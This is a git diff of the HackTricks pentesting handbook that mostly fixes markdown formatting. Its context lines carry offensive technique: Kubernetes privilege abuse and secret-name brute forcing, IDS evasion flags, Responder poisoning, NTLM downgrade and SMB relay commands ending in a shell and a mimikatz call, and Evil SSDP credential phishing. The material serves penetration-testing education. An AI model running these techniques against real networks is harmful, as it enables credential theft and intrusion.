 Then it's possible to create **`malicious-RoleBinging.json`**, which **binds the admin role to other compromised service account:**
 
@@ -228,17 +228,17 @@ https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
 
 ## **Impersonating privileged accounts**
 
-With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation)** **privilege, an attacker could impersonate a privileged account.
+With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) **** privilege, an attacker could impersonate a privileged account.
 
 In this example, the service account _**sa-imper**_ has a binding to a ClusterRole  with rules that allow it to impersonate groups and users.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole_for_user_impersonation.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation.png)
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole_for_user_impersonation\_2.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation\_2.png)
 
-It's possible to **list all secrets **with `--ass=null --as-group=system:master` attributes:
+It's possible to **list all secrets** with `--ass=null --as-group=system:master` attributes:
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/listing_secrets_with_and_without_user_impersonation-1024x108.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_with\_and\_without\_user\_impersonation-1024x108.png)
 
 **It's also possible to perform the same action via the API REST endpoint:**
 
@@ -252,27 +252,27 @@ https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 
 ## **Reading a secret – brute-forcing token IDs**
 
-An attacker that found a token with permission to read a secret  can’t use this permission without knowing the full secret’s name. This permission is different from the _**listing** **secrets**_ permission described above.
+An attacker that found a token with permission to read a secret  can’t use this permission without knowing the full secret’s name. This permission is different from the _**listing**  **secrets**_ permission described above.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/getting_secret_clusterRole.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/getting\_secret\_clusterRole.png)
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRoleBinding_with_get_secrets_clusterRole.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRoleBinding\_with\_get\_secrets\_clusterRole.png)
 
 Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enlisted.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/default_service_accounts_list.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_accounts\_list.png)
 
 Each service account has an associated secret with a static (non-changing) prefix and a postfix of a random five-character string token at the end.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/default_service_account_on_kube_system_namespace-1024x556.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_account\_on\_kube\_system\_namespace-1024x556.png)
 
 The random token structure is 5-character string built from alphanumeric (lower letters and digits) characters. **But it doesn’t contain all the letters and digits.**
 
 When looking inside the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83), it appears that the token is generated from only 27 characters “bcdfghjklmnpqrstvwxz2456789” and not 36 (a-z and 0-9)
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/character_set_from_rand_go.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/character\_set\_from\_rand\_go.png)
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/comments_on_removing_characters_rand_go_character_set-1024x138.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/comments\_on\_removing\_characters\_rand\_go\_character\_set-1024x138.png)
 
 This means that there are  275 = 14,348,907 possibilities for a token.
 
@@ -292,17 +292,17 @@ Let’s see an example for such prevention.
 
 A service account named _sa7_ is in a RoleBinding _edit-role-rolebinding_. This RoleBinding object has a role named _edit-role_ that has **full permissions rules** on roles. Theoretically, it means that the service account can **edit** **any role** in the _default_ namespace.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/edit_roles_roleBinding_binding_sa7\_to_edit_role.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_roles\_roleBinding\_binding\_sa7\_to\_edit\_role.png)
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/role_to_edit_any_role.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/role\_to\_edit\_any\_role.png)
 
 There is also an existing role named _list-pods_. Anyone with this role can list all the pods on the _default_ namespace. The user _sa7_ should have permissions to edit any roles, so let’s see what happens when it tries to add the “secrets” resource to the role’s resources.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/edit_role_resources-300x66.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_role\_resources-300x66.png)
 
 After trying to do so, we will receive an error “forbidden: attempt to grant extra privileges” (Figure 31), because although our _sa7_ user has permissions to update roles for any resource, it can update the role only for resources that it has permissions over.
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden_attempt_to_gran_extra_privileges_message-1024x288.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png)
 
 ## Best Practices
 
@@ -315,12 +315,12 @@ From version 1.6+ it is possible to prevent automounting of service account toke
 On a service account it should be added like this:\
 
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/serviceAccount_with_autoamountServiceAccountToken_false.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/serviceAccount\_with\_autoamountServiceAccountToken\_false.png)
 
 It is also possible to use it on the pod:\
 
 
-![](https://www.cyberark.com/wp-content/uploads/2018/12/pod_with_autoamountServiceAccountToken_false.png)
+![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png)
 
 ### **Grant specific users to RoleBindings\ClusterRoleBindings**
 
diff --git a/pentesting/pentesting-modbus.md b/pentesting/pentesting-modbus.md
index 193b2fed..1b8a1490 100644
--- a/pentesting/pentesting-modbus.md
+++ b/pentesting/pentesting-modbus.md
@@ -4,7 +4,7 @@
 
 Modbus Protocol is a messaging structure developed by Modicon in 1979. It is used to establish master-slave/client-server communication between intelligent devices.
 
-**Default port: **502
+**Default port:** 502
 
 ```
 PORT    STATE SERVICE
diff --git a/pentesting/pentesting-network/README.md b/pentesting/pentesting-network/README.md
index a3f905fa..289eaff4 100644
--- a/pentesting/pentesting-network/README.md
+++ b/pentesting/pentesting-network/README.md
@@ -1,8 +1,8 @@
 # Pentesting Network
 
-If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the **[**💬**](https://emojipedia.org/speech-balloon/)** **[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
 If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks\*\*]\(https://github.com/carlospolop/hacktricks) **that will be reflected in this book.**\
-**Don't forget to **give ⭐ on the github to motivate me to continue developing this book.
+**Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
 
 ## Discovering hosts from the outside
 
@@ -111,7 +111,7 @@ alive6 <IFACE> # Send a pingv6 to multicast.
 Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\
 But, as you are in the **same network** as the other hosts, you can do **more things**:
 
-* If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255` 
+* If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255`&#x20;
 * Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
 * Use the `-PEPM` flag of `nmap`to perform host discovery sending **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PEPM -sP –vvv -n 10.12.5.0/24`
 
@@ -465,7 +465,7 @@ For more information about how to attack this protocol go to the book _**Network
 
 #### EIGRP
 
-The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication. \__[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
+The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication. \_\_[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
 
 For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_
 
diff --git a/pentesting/pentesting-network/ids-evasion.md b/pentesting/pentesting-network/ids-evasion.md
index a4c889f0..188fdd7e 100644
--- a/pentesting/pentesting-network/ids-evasion.md
+++ b/pentesting/pentesting-network/ids-evasion.md
@@ -4,23 +4,23 @@
 
 Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.
 
-**Nmap option: **`--ttlvalue <value>`
+**Nmap option:** `--ttlvalue <value>`
 
 ## Avoiding signatures
 
 Just add garbage data to the packets so the IPS/IDS signature is avoided.
 
-**Nmap option: **`--data-length 25`
+**Nmap option:** `--data-length 25`
 
 ## **Fragmented Packets**
 
 Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.
 
-**Nmap option: **`-f`
+**Nmap option:** `-f`
 
 ## **Invalid** _**checksum**_
 
-Sensors usually don't calculate checksum for performance reasons._** **_So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host. **Example:
+Sensors usually don't calculate checksum for performance reasons. _****_ So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example:
 
 Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.
 
diff --git a/pentesting/pentesting-network/pentesting-ipv6.md b/pentesting/pentesting-network/pentesting-ipv6.md
index 6192a238..bf48cd29 100644
--- a/pentesting/pentesting-network/pentesting-ipv6.md
+++ b/pentesting/pentesting-network/pentesting-ipv6.md
@@ -6,7 +6,7 @@
 
 In an IPv6 address, the **first 48 bits are the network prefix**. The **next 16 bits are the subnet ID** and are used for defining subnets. The last **64 bits are the interface identifier** (which is also known as the Interface ID or the Device ID, is for devices). If necessary, the bits that are normally reserved for the Device ID can be used for additional subnet masking.
 
-There is not ARP in IPv6. Instead, there is **ICMPv6 NS (Neighbor Solicitation) and NA (Neighbor Advertisement)**. The **NS **is used to resolve and address, so it sends **multicast **packets. The **NA **is **unicast **as is used to answer the NS. A NA packet could also be sent without needing a NS packet.
+There is not ARP in IPv6. Instead, there is **ICMPv6 NS (Neighbor Solicitation) and NA (Neighbor Advertisement)**. The **NS** is used to resolve and address, so it sends **multicast** packets. The **NA** is **unicast** as is used to answer the NS. A NA packet could also be sent without needing a NS packet.
 
 **0:0:0:0:0:0:0:1** = 1  – This is 127.0.0.1 equivalent in IPv4.
 
@@ -21,7 +21,7 @@ ip neigh | grep ^fe80
 alive6 eth0
 ```
 
-If you** know the MAC address of a host in the same net** as you (you could just ping its ipv4 address and view the arp table to found its MAC address), you can calculate his Link-local address to communicate with him.\
+If you **know the MAC address of a host in the same net** as you (you could just ping its ipv4 address and view the arp table to found its MAC address), you can calculate his Link-local address to communicate with him.\
 Suppose the **MAC address** is **`12:34:56:78:9a:bc`**
 
 1. To IPv6 notation: **`1234:5678:9abc`**
@@ -36,7 +36,7 @@ Suppose the **MAC address** is **`12:34:56:78:9a:bc`**
 **FF00::/8**  – The multicast range.
 
 **Anycast:**  This form of ipv6 address is similar to the multicast address with a slight difference. Anycast address can also be refered to as One to Nearest. It can be used to address packets meant for multiple interfaces; but usually it sends packets to the first interface it finds as defined in the routing distance. This means it send packets to the closest interface as determined by routing protocols.\
-**20000::/3  **– The global unicast address range.
+**20000::/3**  – The global unicast address range.
 
 fe80::/10--> Unique Link-Local (169.254.x.x) \[fe80:0000:0000:0000:0000:0000:0000:0000,febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff]\
 fc00::/7 --> Unique Local-Unicast (10.x.x.x, 172.16.x.x, 192.168.x.x) \[]\
@@ -85,7 +85,7 @@ site:ipv6./
 
 ### DNS
 
-You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS** **to find IPv6 addresses.
+You could also try to search "**AXFR**"(zone transfer), "**AAAA**"(IPv6) or even "**ANY**" (all) registry in DNS **** to find IPv6 addresses.
 
 ### Ping6
 
diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
index bdfa5281..bb869c80 100644
--- a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
+++ b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -26,7 +26,7 @@ Responder automates the WPAD attack—running a proxy and directing clients to a
 > The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
 
 [**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_\
-__You can find here **Responder for windows **here: [https://github.com/lgandx/Responder-Windows](https://github.com/lgandx/Responder-Windows)__\
+__You can find here **Responder for windows** here: [https://github.com/lgandx/Responder-Windows](https://github.com/lgandx/Responder-Windows)__\
 __To run default Responder behaviour you only have to execute:
 
 ```bash
@@ -35,7 +35,7 @@ responder -I <Iface>
 
 ![](<../../.gitbook/assets/image (172).png>)
 
-An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked **[**following this guide**](../../windows/ntlm/#ntlmv1-attack)**.**
+An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows/ntlm/#ntlmv1-attack)**.**
 
 ```bash
 #Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
@@ -48,7 +48,7 @@ By **default**, the **WPAD impersonation won't be executed**, but you can execut
 responder -I <Iface> --wpad
 ```
 
-Responder can also send **fake DNS responses** (so the IP of the attacker is resolved) and can inject** PAC files** so the victim will get the IP of the **attacker as a proxy**.
+Responder can also send **fake DNS responses** (so the IP of the attacker is resolved) and can inject **PAC files** so the victim will get the IP of the **attacker as a proxy**.
 
 ```bash
 responder.py -I <interface> -w On #If the computer detects the LAN configuration automatically, this will impersonate it
@@ -60,13 +60,13 @@ You can also **resolve NetBIOS** requests with **your IP**. And create an **auth
 responder.py -I <interface> -rPv
 ```
 
-You won't be able to intercept NTLM hashes (normally), but you can easily grab some **NTLM challenges and responses** that you can **crack **using for example _**john **_option` --format=netntlmv2`.
+You won't be able to intercept NTLM hashes (normally), but you can easily grab some **NTLM challenges and responses** that you can **crack** using for example _**john**_ option `--format=netntlmv2`.
 
-The** logs and the challenges** of default _**Responder **_installation in kali can be found in `/usr/share/responder/logs`
+The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
 
 ### Capturing credentials
 
-Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols,** he will try to authenticate against Responde**r and Responder will be able to **capture **the "credentials" (most probably a **NTLMv2 Challenge/Response**):
+Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
 
 ![](<../../.gitbook/assets/poison (1) (1).jpg>)
 
@@ -74,34 +74,34 @@ Responder is going to **impersonate all the service using the mentioned protocol
 
 > Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
 
-[**Inveigh **](https://github.com/Kevin-Robertson/Inveigh)is a PowerShell script that has the same main features as Responder.
+[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)is a PowerShell script that has the same main features as Responder.
 
 ![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
 
 ## Relay Attack
 
-**Most of the information for this section was taken from **[**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)****
+**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)****
 
-This attack uses the Responder toolkit to **capture SMB authentication sessions **on an internal network, and **relays **them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
-Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed **host and **SMB signing must be disabled**.
+This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
+Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
 
-The 3 main **tools **to perform this attack are: **smb_relay **(metasploit), **MultyRelay **(responder), and **smbrealyx **(impacket).
+The 3 main **tools** to perform this attack are: **smb\_relay** (metasploit), **MultyRelay** (responder), and **smbrealyx** (impacket).
 
-Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in ** **_**/usr/share/responder/Responder.conf **_and then execute responder on the desired **interface**: `responder -I eth0 -rv`
+Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in ** **_**/usr/share/responder/Responder.conf**_ and then execute responder on the desired **interface**: `responder -I eth0 -rv`
 
 You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`\
-The  option `SRVHOST `is used to point the server **were you want to get access**.\
-Then, when **any host try to authenticate against you**, metasploit will** try to authenticate against the other **server.
+The  option `SRVHOST` is used to point the server **were you want to get access**.\
+Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.
 
-You** can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit **will **always **send a "_**Denied**_" **response **to the **client **that is trying to connect to you.
+You **can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
 
-If you want to use **smbrelayx **now you should run:
+If you want to use **smbrelayx** now you should run:
 
 ```
 smbrelayx.py -h <IP target> -c "ipconfig"
 ```
 
-If you want to use **MultiRelay**, go to _**/usr/share/responder/tools **_and execute MultiRelay (`-t <IP target> -u <User>`):
+If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and execute MultiRelay (`-t <IP target> -u <User>`):
 
 ```bash
 python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
@@ -116,7 +116,7 @@ python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
 
 ![Step 41 | Intrinium.com](https://intrinium.com/wp-content/uploads/step41.png)
 
-**Mimikatz **commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.:**` Mimi sekurlsa::logonpasswords`**
+**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**
 
 ## InveighZero
 
@@ -181,7 +181,7 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS
 
 ## References
 
-**Images from: **[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
+**Images from:** [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
 [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
 [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
 [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
diff --git a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
index 1b8b4d1e..cfbf393d 100644
--- a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
+++ b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
@@ -1,6 +1,6 @@
 # Spoofing SSDP and UPnP Devices with EvilSSDP
 
-**This post was copied from **[**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)****
+**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)****
 
 ## **Introduction**
 
@@ -16,7 +16,7 @@ Now that we understood the basic functions of SSDP or UPnP, let’s use it to ma
 
 ### **Installation**
 
-The Evil SSDP too was developed by [initstring](https://twitter.com/init_string). This tool is hosted on the GitHub. We will be using the git clone command to clone all the contents of the git onto our attacker machine. The git clone command will create a directory with the same name as on GitHub. Since the tool is developed in Python version 3, we will have to use the python3 followed by the name of the .py file in order to run the program. Here we can see a basic help screen of the tool.
+The Evil SSDP too was developed by [initstring](https://twitter.com/init\_string). This tool is hosted on the GitHub. We will be using the git clone command to clone all the contents of the git onto our attacker machine. The git clone command will create a directory with the same name as on GitHub. Since the tool is developed in Python version 3, we will have to use the python3 followed by the name of the .py file in order to run the program. Here we can see a basic help screen of the tool.
 
 ```bash
 git clone https://github.com/initstring/evil-ssdp.git
@@ -24,7 +24,7 @@ cd evil-ssdp/ls
 python3 evil-ssdp.py --help
 ```
 
-![](https://i0.wp.com/1.bp.blogspot.com/-O6lddDvxqts/Xkq5PHqeE_I/AAAAAAAAisQ/FKOCxVwT9cMy54lLy0SsYcKoM5Q95K5mQCLcBGAsYHQ/s1600/1.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-O6lddDvxqts/Xkq5PHqeE\_I/AAAAAAAAisQ/FKOCxVwT9cMy54lLy0SsYcKoM5Q95K5mQCLcBGAsYHQ/s1600/1.png?w=687\&ssl=1)
 
 In the cloned directory, we will find a directory named templates. It contains all the pre complied templates that can be used to phish the target user.
 
@@ -43,13 +43,13 @@ ls temlates/
 python3 evil-ssdp.py eth0 --template scanner
 ```
 
-![](https://i0.wp.com/1.bp.blogspot.com/-kg05jQ03Fnw/Xkq5Qing_qI/AAAAAAAAisk/GYK8MuCKqKUalqh3DHGWVRoyDlAQaxUrwCLcBGAsYHQ/s1600/2.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-kg05jQ03Fnw/Xkq5Qing\_qI/AAAAAAAAisk/GYK8MuCKqKUalqh3DHGWVRoyDlAQaxUrwCLcBGAsYHQ/s1600/2.png?w=687\&ssl=1)
 
 ### **Manipulating User**
 
 The next logical step is to manipulate the user to click on the application. Being on the same network as the target will show our fake scanner on its explorer. This is where the UPnP is in works. The Evil SSDP tool creates this genuine-looking scanner on the system on the target without any kind of forced interaction with the target.
 
-![](https://i1.wp.com/1.bp.blogspot.com/-\_05xXp10Buk/Xkq5Qz4yosI/AAAAAAAAiso/HdHr0qJ59rkR2ur_UYcrHMdf93uqMhXUwCLcBGAsYHQ/s1600/3.png?w=687\&ssl=1)
+![](https://i1.wp.com/1.bp.blogspot.com/-\_05xXp10Buk/Xkq5Qz4yosI/AAAAAAAAiso/HdHr0qJ59rkR2ur\_UYcrHMdf93uqMhXUwCLcBGAsYHQ/s1600/3.png?w=687\&ssl=1)
 
 Upon clicking the icon inside the Explorer, we will be redirected to the default Web Browser, opening our hosted link. The templates that we used are in play here. The user is now aware he/she is indeed connected to a genuine scanner or a fake UPnP device that we generated. Unaware target having no clue enters the valid credentials on this template as shown in the image given below.
 
@@ -59,7 +59,7 @@ Upon clicking the icon inside the Explorer, we will be redirected to the default
 
 As soon as the target user enters the credentials, we check our terminal on the attacker machine to find that we have the credentials entered by the user. As there is no conversation required for each target device, our fake scanner is visible to each and every user in the network. This means the scope of this kind of attack is limitless.
 
-![](https://i1.wp.com/1.bp.blogspot.com/-RAI02igc4F4/Xkq5RSJ3j2I/AAAAAAAAisw/p47jd_jyyAE3RQIpms6nd-TzsPygD4CXQCLcBGAsYHQ/s1600/5.png?w=687\&ssl=1)
+![](https://i1.wp.com/1.bp.blogspot.com/-RAI02igc4F4/Xkq5RSJ3j2I/AAAAAAAAisw/p47jd\_jyyAE3RQIpms6nd-TzsPygD4CXQCLcBGAsYHQ/s1600/5.png?w=687\&ssl=1)
 
 ## **Spoofing Office365 SSDP**
 
@@ -81,17 +81,17 @@ As we can see that the tool has done its job and hosted multiple template files
 
 As soon as we run the tool, we have a UPnP device named Office365 Backups. This was done by the tool without having to send any file, payload or any other type of interaction to the target user. All that’s left is the user to click on the icon.
 
-![](https://i0.wp.com/1.bp.blogspot.com/-txqBOw02D6w/Xkq5RgolUcI/AAAAAAAAis4/wkQTzYBmtdU_Nbq9X1qI47FlJtdqHvIjQCLcBGAsYHQ/s1600/7.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-txqBOw02D6w/Xkq5RgolUcI/AAAAAAAAis4/wkQTzYBmtdU\_Nbq9X1qI47FlJtdqHvIjQCLcBGAsYHQ/s1600/7.png?w=687\&ssl=1)
 
 Upon being clicked by the user, the target user is redirected to our fake template page through their default browser. This is a very genuine looking Microsoft webpage. The clueless user enters their valid credentials onto this page.
 
-![](https://i1.wp.com/1.bp.blogspot.com/-69Tf3PRpvhM/Xkq5RziDXzI/AAAAAAAAis8/vjejKgh0XigRHFC2Ib8QCpPlzx_RAu4eACLcBGAsYHQ/s1600/8.png?w=687\&ssl=1)
+![](https://i1.wp.com/1.bp.blogspot.com/-69Tf3PRpvhM/Xkq5RziDXzI/AAAAAAAAis8/vjejKgh0XigRHFC2Ib8QCpPlzx\_RAu4eACLcBGAsYHQ/s1600/8.png?w=687\&ssl=1)
 
 ### **Grabbing the Credentials**
 
 As soon as the user enters the credentials and they get passed as the post request to the server, which is our target machine, we see that on our terminal, we have the credentials.
 
-![](https://i0.wp.com/1.bp.blogspot.com/-3KXN6DKT_E0/Xkq5SEwhKHI/AAAAAAAAitA/a2gTi5UwNE0JsMH-XQEW33MchkxgjPGSwCLcBGAsYHQ/s1600/9.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-3KXN6DKT\_E0/Xkq5SEwhKHI/AAAAAAAAitA/a2gTi5UwNE0JsMH-XQEW33MchkxgjPGSwCLcBGAsYHQ/s1600/9.png?w=687\&ssl=1)
 
 ## **Diverting User to a Password Vault SSDP**
 
@@ -105,21 +105,21 @@ As we did in our previous practices, we will have to set up the template for the
 python3 evil-ssdp.py eth0 --template password-vault
 ```
 
-![](https://i2.wp.com/1.bp.blogspot.com/-YPQirClmWN4/Xkq5O5WFgoI/AAAAAAAAisI/4\_i4ogVRWE0C_ez3p6EkL8YdJ0ot48DmwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
+![](https://i2.wp.com/1.bp.blogspot.com/-YPQirClmWN4/Xkq5O5WFgoI/AAAAAAAAisI/4\_i4ogVRWE0C\_ez3p6EkL8YdJ0ot48DmwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
 
 ### **Manipulating User**
 
 Moving onto the target machine, we see that the Password Vault UPnP is visible in the Explorer. Now lies that the user clicks on the device and gets trapped into our attack. Seeing something like Password Vault, the user will be tempted to click on the icon.
 
-![](https://i2.wp.com/1.bp.blogspot.com/-3oMPYaCZ46k/Xkq5PB4zQ_I/AAAAAAAAisM/i5C8qZVB8RYWBwAkiKCZbdptIbsnk4CUwCLcBGAsYHQ/s1600/11.png?w=687\&ssl=1)
+![](https://i2.wp.com/1.bp.blogspot.com/-3oMPYaCZ46k/Xkq5PB4zQ\_I/AAAAAAAAisM/i5C8qZVB8RYWBwAkiKCZbdptIbsnk4CUwCLcBGAsYHQ/s1600/11.png?w=687\&ssl=1)
 
 As the clueless user thinks that he/she has achieved far most important stuff with the fake keys and passwords. This works as a distraction for the user, as this will lead the user to try this exhaustive list of credentials with no success.
 
-![](https://i0.wp.com/1.bp.blogspot.com/-SrCMlWIUxCM/Xkq5Pg_IznI/AAAAAAAAisU/L_ZIvQKfltkyk9iUCrEGyXCojx5b86uFgCLcBGAsYHQ/s1600/12.png?w=687\&ssl=1)
+![](https://i0.wp.com/1.bp.blogspot.com/-SrCMlWIUxCM/Xkq5Pg\_IznI/AAAAAAAAisU/L\_ZIvQKfltkyk9iUCrEGyXCojx5b86uFgCLcBGAsYHQ/s1600/12.png?w=687\&ssl=1)
 
 ## **Spoofing Microsoft Azure SSDP**
 
